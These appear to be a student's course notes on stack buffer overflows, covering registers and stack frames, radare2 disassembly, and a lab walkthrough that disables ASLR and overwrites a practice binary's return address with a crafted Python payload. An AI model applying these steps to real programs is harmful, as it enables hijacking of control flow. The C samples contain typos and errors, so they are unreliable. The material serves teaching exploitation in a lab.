245CT: Buffer overflows.
Overview
- What is the stack
- How to we smash it
- Redirecting application flow
- "Classic" overflows
Stack smashing:
- Proper computer science
- Best part of CS
What is an overflow:
- We end up in memory we shouldnt be in
- If weve allocated space, and then we jump into another bit of memory to read it
- Where we expect a string, it will bring garbled data
- If we figure out where the EIP is, we can put a new address that goes to malicious code.
Why overflows occur:
-
In C/C++ memory for variables is pre-allocated
- The program expects the user to repsect this
- COmpiler expects good coders who understand dangers
- Allows us to allocte too much space and overwrite other parts of memory.
-
A segmentation fault is an overflow that happens by mistake. (most the time)
Example of overflow code:
#include <stdiio.h>
void main(void){
int theArray[10];
for(int i=0; i<10; i++){
theArray[i] = i;
}
for (int i=0; i<20; i++){
printf("reading location %d ", i)
int value = theArray[i]
printf("%d\n",value);
}
}
Segfault.c output
┌──(user㉿kali)-[~/Desktop/overflows]
└─$ ./segfault
reading location 0 0
reading location 1 1
reading location 2 2
reading location 3 3
reading location 4 4
reading location 5 5
reading location 6 6
reading location 7 7
reading location 8 8
reading location 9 9
reading location 10 -368553904
reading location 11 21890
reading location 12 903344368
reading location 13 903344368
reading location 14 14
reading location 15 10
reading location 16 -368553552
reading location 17 21890
reading location 18 -329396982
reading location 19 32521
Explanation:
The stack:
-
Program memory for currently running processes
-
Keeps track of Function calls, variables etc
-
Fundamental to make programs work.
-
We can call new vars as the program runs bc of the stack
-
FILO
-
Rach process allocated a "ch8unk" of memory. The stack frame:
- COntains, variables, data, pointers to other locations.
-
It is efficeint as it allows branching which is more dynamic.
-
The stack is used to allocate memory for the programs currently running processes
- Its a traditional stack style data struct (plates stacked, FILO)
-
The Heap is used for allocating memory on the fly
-
Registers are small bits of memory that have their own uses.
SI/DI input and output of data SP stack pointer BP abase pointer EAX - EDX = Gen purpose
AX is 16bit, AH and AL splits these as 8bit parts EAX is the 32bit register.
IP: Instruction pointer, tells program where to go. BP: Tells where the bottom of the stack is.
The IP:
Also known as EIP(32bit)RIP(64bit) Instruction pointer stored on the stack
With an overflow, we mangle the code, overwrite chunk of memory allocated for IP, that then gets loaded when the funciton returns, we get access to the program
stackframes.c
int add(int var1, int var2){
//Add two numbers
int total;
total = var1+var2;
return total;
}
void main(int argv, char* argc){
//Function call
int total = add(10, 20);
}
- must install multilib
sudo apt install gcc-multilib
stackframes.c output
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ sudo gcc -m32 stackFrames.c 1 ⨯
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ ls
a.out firstOverflow.c Makefile stackFrames.c strOverflow.c
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ r2 a.out
Warning: run r2 with -e io.cache=true to fix relocations in disassembly
[0x00001050]>
[0x00001050]> ls
Makefile ./ strOverflow.c stackFrames.c
firstOverflow.c a.out ../
^C
[0x00001050]>
[0x00001050]> exit
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ r2 a.out
Warning: run r2 with -e io.cache=true to fix relocations in disassembly
[0x00001050]> pdf@sym.main
p: Cannot find function at 0x000011a9
[0x00001050]> aa
[x] Analyze all flags starting with sym. and entry0 (aa)
[0x00001050]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x00001050]> pdf@sym.main
┌ 34: int main (int argc, char **argv, char **envp);
│ ; var int32_t var_4h @ ebp-0x4
│ 0x000011a9 55 push ebp
│ 0x000011aa 89e5 mov ebp, esp
│ 0x000011ac 83ec10 sub esp, 0x10
│ 0x000011af e817000000 call sym.__x86.get_pc_thunk.ax
│ 0x000011b4 054c2e0000 add eax, 0x2e4c
│ 0x000011b9 6a14 push 0x14
│ 0x000011bb 6a0a push 0xa
│ 0x000011bd e8c7ffffff call sym.add
│ 0x000011c2 83c408 add esp, 8
│ 0x000011c5 8945fc mov dword [var_4h], eax
│ 0x000011c8 90 nop
│ 0x000011c9 c9 leave
└ 0x000011ca c3 ret
[0x00001050]>
- sym.add
[0x00001050]> pdf @sym.add
; CALL XREF from main @ 0x11bd
┌ 32: sym.add (int32_t arg_8h, int32_t arg_ch);
│ ; var int32_t var_4h @ ebp-0x4
│ ; arg int32_t arg_8h @ ebp+0x8
│ ; arg int32_t arg_ch @ ebp+0xc
│ 0x00001189 55 push ebp
│ 0x0000118a 89e5 mov ebp, esp
│ 0x0000118c 83ec10 sub esp, 0x10
│ 0x0000118f e837000000 call sym.__x86.get_pc_thunk.ax
│ 0x00001194 056c2e0000 add eax, 0x2e6c
│ 0x00001199 8b5508 mov edx, dword [arg_8h]
│ 0x0000119c 8b450c mov eax, dword [arg_ch]
│ 0x0000119f 01d0 add eax, edx
│ 0x000011a1 8945fc mov dword [var_4h], eax
│ 0x000011a4 8b45fc mov eax, dword [var_4h]
│ 0x000011a7 c9 leave
└ 0x000011a8 c3 ret
[0x00001050]>
Notes:
firstOverflow.c3
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ ls
a.out firstOverflow.c Makefile stackFrames.c strOverflow.c
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ make
gcc -m32 -g -z execstack firstOverflow.c -o firstOverflow
/usr/bin/ld: cannot open output file firstOverflow: Permission denied
collect2: error: ld returned 1 exit status
make: *** [Makefile:9: firstOverflow] Error 1
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ sudo make 2 ⨯
[sudo] password for user:
gcc -m32 -g -z execstack firstOverflow.c -o firstOverflow
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ ./firstOverflow
Overflow the Buffer
Overflow the buffer
Hint! Try `python -c "print 'A'*100"`
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ ./firstOverflow 'python -c "print('a'*10)"' 255 ⨯
Overflow the Buffer
Off to 0x565f5215
Current Memory Address is 0x565f5215
Aim for 0x565f51d9
Lose :(
Notes:
firstOverflow ASLR Problem
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ ./firstOverflow 'python -c "print('a'*10)"'
Overflow the Buffer
Off to 0x56609215
Current Memory Address is 0x56609215
Aim for 0x566091d9
Lose :(
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ ./firstOverflow 'python -c "print('a'*10)"'
Overflow the Buffer
Off to 0x56641215
Current Memory Address is 0x56641215
Aim for 0x566411d9
Lose :(
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ ./firstOverflow 'python -c "print('a'*10)"'
Overflow the Buffer
Off to 0x5662a215
Current Memory Address is 0x5662a215
Aim for 0x5662a1d9
Lose :(
-
We need to turn it off using: echo 0 > /proc/sys/kernel/randomize_va_space
-
Will fix auto, but use echo 2 > /proc/sys to turn back on
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ sudo sysctl kernel.randomize_va_space=0 1 ⨯
kernel.randomize_va_space = 0
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ ./firstOverflow 'python -c "print('a'*10)"'
Overflow the Buffer
Off to 0x56556215
Current Memory Address is 0x56556215
Aim for 0x565561d9
Lose :(
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ ./firstOverflow 'python -c "print('a'*10)"'
Overflow the Buffer
Off to 0x56556215
Current Memory Address is 0x56556215
Aim for 0x565561d9
Lose :(
The memory addresses are now the same
./firstOverflow
python -c "print('A'*200)"
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ ./firstOverflow `python -c "print('A'*400)"`
Overflow the Buffer
Off to 0x41414141
zsh: segmentation fault ./firstOverflow `python -c "print('A'*400)"`
We then move around till we get the right return:
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ ./firstOverflow `python -c "print('A'*170)"` 130 ⨯
Overflow the Buffer
Off to 0x56556215
Current Memory Address is 0x56556215
Aim for 0x565561d9
Lose :(
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ ./firstOverflow `python -c "print('A'*174)"`
Overflow the Buffer
Off to 0x56554141
zsh: segmentation fault ./firstOverflow `python -c "print('A'*174)"`
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ ./firstOverflow `python -c "print('A'*172+'BBBB'+'Zxd9\x61\x55\x56')"` 139 ⨯
Overflow the Buffer
Off to 0x42424242
zsh: segmentation fault ./firstOverflow `python -c "print('A'*172+'BBBB'+'Zxd9\x61\x55\x56')"`
┌──(user㉿kali)-[~/Documents/245-Labs/Week9_Overflows/Intro]
└─$ ./firstOverflow `python -c "print('A'*172+'\xd9\x61\x55\x56')"` 139 ⨯
Overflow the Buffer
Off to 0x565561d9
===== Win =====
$
Resources:
https://www.coengoedegebure.com/buffer-overflow-attacks-explained/